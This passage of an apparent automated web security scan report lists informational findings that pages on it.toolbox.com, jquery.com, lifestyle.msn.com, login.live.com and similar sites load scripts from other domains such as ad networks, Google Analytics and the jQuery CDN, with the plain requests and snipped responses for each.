<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/bi.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=509272757?">

   </script>
...[SNIP]...

18.155. http://it.toolbox.com/blogs/minimalit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/minimalit

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=627710031?
http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=minimalit;kw=managament;kw=itarchitecture;kw=itspend;kw=spendreduction;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=627710031?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/minimalit HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60029
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Minimal IT:
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=minimalit;kw=managament;kw=itarchitecture;kw=itspend;kw=spendreduction;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=627710031?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=627710031?">

   </script>
...[SNIP]...

18.156. http://it.toolbox.com/blogs/penguinista-databasiensis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/penguinista-databasiensis

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/linux.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=1662680178?
http://ad.doubleclick.net/adj/linux.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=linux;kw=DB2;kw=database;kw=IBM;sz=728x90,468x60,1x1;tile=6;ord=1662680178?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/penguinista-databasiensis HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46021
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Penguinista
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/linux.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=linux;kw=DB2;kw=database;kw=IBM;sz=728x90,468x60,1x1;tile=6;ord=1662680178?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/linux.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=1662680178?">

   </script>
...[SNIP]...

18.157. http://it.toolbox.com/blogs/ppmtoday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/ppmtoday

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=824548379?
http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=ppm;kw=projectportfoliomanagement;kw=projectmanagement;kw=portfoliomanagement;kw=itmanagement;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=824548379?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp
http://www.google-analytics.com/urchin.js

Request

GET /blogs/ppmtoday HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63632
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=ppm;kw=projectportfoliomanagement;kw=projectmanagement;kw=portfoliomanagement;kw=itmanagement;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=824548379?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=824548379?">

   </script>
...[SNIP]...
<span><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.158. http://javascript.nwbox.com/IEContentLoaded/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://javascript.nwbox.com
Path:	/IEContentLoaded/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /IEContentLoaded/ HTTP/1.1
Host: javascript.nwbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:24:59 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Sun, 01 Aug 2010 04:41:14 GMT
ETag: "4366-b1a50e80"
Accept-Ranges: bytes
Content-Length: 17254
Cache-Control: max-age=259200
Expires: Sat, 05 Feb 2011 22:24:59 GMT
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>IECo
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

18.159. http://johannburkard.de/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://johannburkard.de
Path:	/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html

Issue detail

The response dynamically includes the following script from another domain:

http://c0003418.cdn2.cloudfiles.rackspacecloud.com/johannburkard-v5.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4C474270C78D978371F54CBF92957F65; Path=/
ETag: "84462d5d318033c5e14b0eb34b0de254"
Last-Modified: Wed, 10 Feb 2010 10:10:37 GMT
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 15:32:13 GMT
Content-Length: 26576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><!-- #BeginTemplate "/Templates/default.dwt"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://c0003418.cdn2.cloudfiles.rackspacecloud.com/johannburkard-v5.css"/>
<script type="text/javascript" src="http://c0003418.cdn2.cloudfiles.rackspacecloud.com/johannburkard-v5.js"></script>
...[SNIP]...

18.160. http://jquery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:32:12 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 31 Jan 2011 15:06:39 GMT
ETag: "7520fc2-3ea2-c344bdc0"
Accept-Ranges: bytes
Content-Length: 16034
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

18.161. http://jquery.malsup.com/cycle/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.malsup.com
Path:	/cycle/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.latest.js
http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js
http://malsup.github.com/chili-1.7.pack.js
http://malsup.github.com/jquery.easing.1.1.1.js
http://www.google-analytics.com/urchin.js

Request

GET /cycle/ HTTP/1.1
Host: jquery.malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:15 GMT
Server: mod_security2/2.5.7
Last-Modified: Tue, 06 Apr 2010 00:35:14 GMT
ETag: "10cdf89-1f7c-483869e727480"
Accept-Ranges: bytes
Content-Length: 8060
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.latest.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.1.1.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.162. http://jquery.org/license previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.org
Path:	/license

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /license HTTP/1.1
Host: jquery.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:32:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Feb 2011 15:19:45 GMT
ETag: "79985e4-206a-2dcce640"
Accept-Ranges: bytes
Content-Length: 8298
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 02 Feb 2011 15:37:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.jquery.com/org/style.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

18.163. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 02 Feb 2011 15:32:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

18.164. http://juicystudio.com/article/improving-ajax-applications-for-jaws-users.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://juicystudio.com
Path:	/article/improving-ajax-applications-for-jaws-users.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.flickr.com/badge_code_v2.gne?count=5&display=latest&size=t&layout=v&source=user&user=30664017%40N02

Request

GET /article/improving-ajax-applications-for-jaws-users.php HTTP/1.1
Host: juicystudio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:32:20 GMT
Server: Apache/2.2.17
Vary: Accept
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIi HISi OUR IND ONL COM NAV PRE", policyref="http://juicystudio.com/w3c/p3p.xml"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42591

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-gb">
<head>
   <title>Juicy Studio: Improving Ajax applications for JAWS users</title>
   <meta
...[SNIP]...
<div id="flickr_w">
       <script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=5&display=latest&size=t&layout=v&source=user&user=30664017%40N02"></script>
...[SNIP]...

18.165. http://leads.demandbase.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leads.demandbase.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js

Request

GET / HTTP/1.1
Host: leads.demandbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=236660194602537908;

Response

18.166. http://leandrovieira.com/projects/jquery/lightbox/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leandrovieira.com
Path:	/projects/jquery/lightbox/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /projects/jquery/lightbox/ HTTP/1.1
Host: leandrovieira.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:20 GMT
Server: Apache
Last-Modified: Wed, 28 Jul 2010 01:05:18 GMT
ETag: "3cac22e-4440-48c68360aaf80"
Accept-Ranges: bytes
Content-Length: 17472
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="tex
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.167. http://lifestyle.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

GET / HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.168. http://lifestyle.msn.com/relationships/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/relationships/

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

GET /relationships/ HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.169. http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/relationships/staticslideshowglamour.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js

Request

GET /relationships/staticslideshowglamour.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.170. http://lifestyle.msn.com/relationships/your-money-today/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/relationships/your-money-today/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_RBK_585X368
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js

Request

Response

18.171. http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-home/cleaning-organizing/staticslideshowrs.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js.

Request

Response

18.172. http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-life/family-fun/staticslideshowrs.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

GET /your-life/family-fun/staticslideshowrs.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.173. http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-life/new-year-new-you/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.widgets.video.s-msn.com/js/embed.js
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://subscribe.hearstmags.com/circulation/shared/scripts/validate-functions.js
http://subscribe.hearstmags.com/circulation/shared/scripts/validate-generic.js

Request

Response

18.174. http://lifestyle.msn.com/your-look/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

GET /your-look/ HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.175. http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/celebrity-style/staticslideshowmc.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_MAR_585X368
http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

GET /your-look/celebrity-style/staticslideshowmc.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.176. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/everyday-style/staticslideshowglamour.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

Response

18.177. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/everyday-style/staticslideshowlucky.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js

Request

Response

18.178. http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/well-groomed-male/staticslideshowgq.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

Response

18.179. http://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.live.com
Path:	/login.srf

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js
http://js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/WLWorkflow.js

Request

GET /login.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 15:35:40 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1F55 V: 0
Content-Type: text/html; charset=utf-8
Expires: Tue, 01 Feb 2011 15:34:40 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: vv=900; HTTPOnly= ; domain=login.live.com;path=/
Set-Cookie: MSPRequ=lt=1296574540&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d45b8a78-d411-4c6c-85b3-f3727bec49d8; path=/;version=1
X-Frame-Options: deny
Content-Length: 11336



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script><script type="text/javascript" src="http://Js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js"></script>
<script type="text/javascript" src="http://Js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/WLWorkflow.js"></script>
...[SNIP]...

18.180. http://mad4milk.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mad4milk.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

GET / HTTP/1.1
Host: mad4milk.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:34:03 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22367b35c5ff7f573e3fa5a17fdddc99df%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1296660843%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Wed, 02-Feb-2011 17:34:03 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-e
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="/assets/styles/style.css" />

   <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

18.181. http://malsup.com/jquery/cycle/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/cycle/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.latest.js
http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js
http://malsup.github.com/chili-1.7.pack.js
http://malsup.github.com/jquery.easing.1.1.1.js
http://www.google-analytics.com/urchin.js

Request

GET /jquery/cycle/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:34:05 GMT
Server: mod_security2/2.5.7
Last-Modified: Tue, 06 Apr 2010 00:35:14 GMT
ETag: "10cdf89-1f7c-483869e727480"
Accept-Ranges: bytes
Content-Length: 8060
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
